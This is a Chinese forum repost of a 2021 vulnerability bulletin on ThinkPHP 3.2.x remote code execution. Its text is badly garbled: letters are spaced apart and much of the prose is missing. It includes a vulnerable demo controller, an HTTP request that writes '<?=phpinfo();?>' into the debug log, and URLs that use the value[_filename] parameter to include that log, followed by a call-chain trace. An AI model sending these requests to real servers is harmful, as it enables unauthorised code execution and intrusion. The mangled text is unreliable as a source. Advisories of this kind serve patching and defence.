搜索

[20645] 2021-07-12_【漏洞通报】ThinkPHP3.2.xRCE漏洞通报

文档创建者:s7ckTeam
浏览次数:58
最后更新:2025-01-18
2021-07-12_【漏洞通报】ThinkPHP3.2.xRCE漏洞通报 T h i n k P H P 3 . 2 . x   R C E K h a n   2 0 2 1 - 0 7 - 1 2   d a r k a r m o u r   l a b s T h i n k P H P 3 . 2 a s s i g n T h i n k P H P P H P W E B T h i n k p h p f o f a   . 线 W e b A P T 线
F O F A 1 3 9 8 0 9 使 t h i n k p h p 9 6 1 7 2 4 , 6 3 8 广 4 , 5 6 0 2 , 8 5 3 1 , 5 8 5 g i t e e : g i t h u b
G i t h u b 3 3 1 2 4 4 , 8 6 3 0 x 0 1   T h i n k P H P 3 . 2 . x _ a s s i g n = > = > = > R C E - @ 稿 - @ u r l :   h t t p : / / x . x . x . x / i n d e x . p h p ? m = H o m e & c = I n d e x & a = i n d e x & v a l u e [ _ f i l e n a m e ] = . A p p l i c a t i o n R u n t i m e L o g s H o m e 2 1 _ 0 6 _ 3 0 . l o g T h i n k P H P 3 . 2 . 3   R C E       0 x 0 2   T h i n k P H P 3 . 2 . 3 a s s i g n a s s i g n d e m o
d e m o d e m o , A p p l i c a t i o n H o m e C o n t r o l l e r I n d e x C o n t r o l l e r . c l a s s . p h p A p p l i c a t i o n H o m e V i e w I n d e x i n d e x . h t m l ( d i s p l a y , f e t c h , s h o w ) f e t c h f e t c h 使 o b _ s t a r t ( ) 使 P H P e c h o ( ) f e t c h e x i t ( ) d i e ( ) ; < ? p h p n a m e s p a c e   H o m e C o n t r o l l e r ; u s e   T h i n k C o n t r o l l e r ; c l a s s   I n d e x C o n t r o l l e r   e x t e n d s   C o n t r o l l e r   {         p u b l i c   f u n c t i o n   i n d e x ( $ v a l u e = ' ' ) {                 $ t h i s - > a s s i g n ( $ v a l u e ) ;                 $ t h i s - > d i s p l a y ( ) ;         } }
T h i n k P H P 3 . 2 . 3   P h p s t u d y 2 0 1 6   P H P - 5 . 6 . 2 7   A p a c h e   W i n d o w s 1 0 d e b u g 1 . d e b u g l o g T h i n k P H P A p p l i c a t i o n R u n t i m e L o g s C o m m o n 2 1 _ 0 6 _ 3 0 . l o g G E T   / i n d e x . p h p ? m = - - > < ? = p h p i n f o ( ) ; ? >   H T T P / 1 . 1 H o s t :   1 2 7 . 0 . 0 . 1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 _ 1 5 _ 6 )   A p p l e W e b K i t / 6 0 5 . 1 . 1 5   ( K H T M L ,   l i k e   G e c k o )   V e r s i o n / 1 3 . 1 . 2   S a f a r i / 6 0 5 . 1 . 1 5 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , * / * ; q = 0 . 8 A c c e p t - L a n g u a g e :   e n - G B , e n ; q = 0 . 5 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e C o n n e c t i o n :   c l o s e C o o k i e :   P H P S E S S I D = b 6 r 4 6 o j g c 9 t v d q p g 9 e f r a o 7 f 6 6 ; U p g r a d e - I n s e c u r e - R e q u e s t s :   1
h t t p : / / 1 2 7 . 0 . 0 . 1 / i n d e x . p h p ? m = H o m e & c = I n d e x & a = i n d e x & v a l u e [ _ f i l e n a m e ] = . / A p p l i c a t i o n / R u n t i m e / L o g s / C o m m o n / 2 1 _ 0 6 _ 3 0 . l o g 2 . d e b u g           d e b u g G E T   / i n d e x . p h p ? m = H o m e & c = I n d e x & a = i n d e x & t e s t = - - > < ? = p h p i n f o ( ) ; ? >   H T T P / 1 . 1
l o g A p p l i c a t i o n R u n t i m e L o g s H o m e 2 1 _ 0 6 _ 3 0 . l o g h t t p : / / 1 2 7 . 0 . 0 . 1 / i n d e x . p h p ? m = H o m e & c = I n d e x & a = i n d e x & v a l u e [ _ f i l e n a m e ] = . / A p p l i c a t i o n / R u n t i m e / L o g s / H o m e / 2 1 _ 0 6 _ 3 0 . l o g 3 . h t t p : / / 1 2 7 . 0 . 0 . 1 / i n d e x . p h p ? m = H o m e & c = I n d e x & a = i n d e x & v a l u e [ _ f i l e n a m e ] = . / t e s t . t x t 0 x 0 3   H o s t :   1 2 7 . 0 . 0 . 1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 _ 1 5 _ 6 )   A p p l e W e b K i t / 6 0 5 . 1 . 1 5   ( K H T M L ,   l i k e   G e c k o )   V e r s i o n / 1 3 . 1 . 2   S a f a r i / 6 0 5 . 1 . 1 5 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , * / * ; q = 0 . 8 A c c e p t - L a n g u a g e :   e n - G B , e n ; q = 0 . 5 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e C o n n e c t i o n :   c l o s e C o o k i e :   P H P S E S S I D = b 6 r 4 6 o j g c 9 t v d q p g 9 e f r a o 7 f 6 6 ; U p g r a d e - I n s e c u r e - R e q u e s t s :   1
1 . a s s i g n A p p l i c a t i o n H o m e C o n t r o l l e r I n d e x C o n t r o l l e r . c l a s s . p h p 2 . a s s i g n $ t h i s t V a r T h i n k P H P L i b r a r y T h i n k V i e w . c l a s s . p h p
3 . d i s p l a y d i s p l a y T h i n k P H P L i b r a r y T h i n k V i e w . c l a s s . p h p 4 . f e t c h . / A p p l i c a t i o n / H o m e / V i e w / I n d e x / i n d e x . h t m l t h i n k e l s e $ t h i s t V a r $ p a r a m s H o o k : : l i s t e n T h i n k P H P L i b r a r y T h i n k V i e w . c l a s s . p h p
5 . l i s t e n e x e c T h i n k P H P L i b r a r y T h i n k H o o k . c l a s s . p h p 6 . e x e c B e h a v i o r P a r s e T e m p l a t e B e h a v i o r r u n $ p a r a m s
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理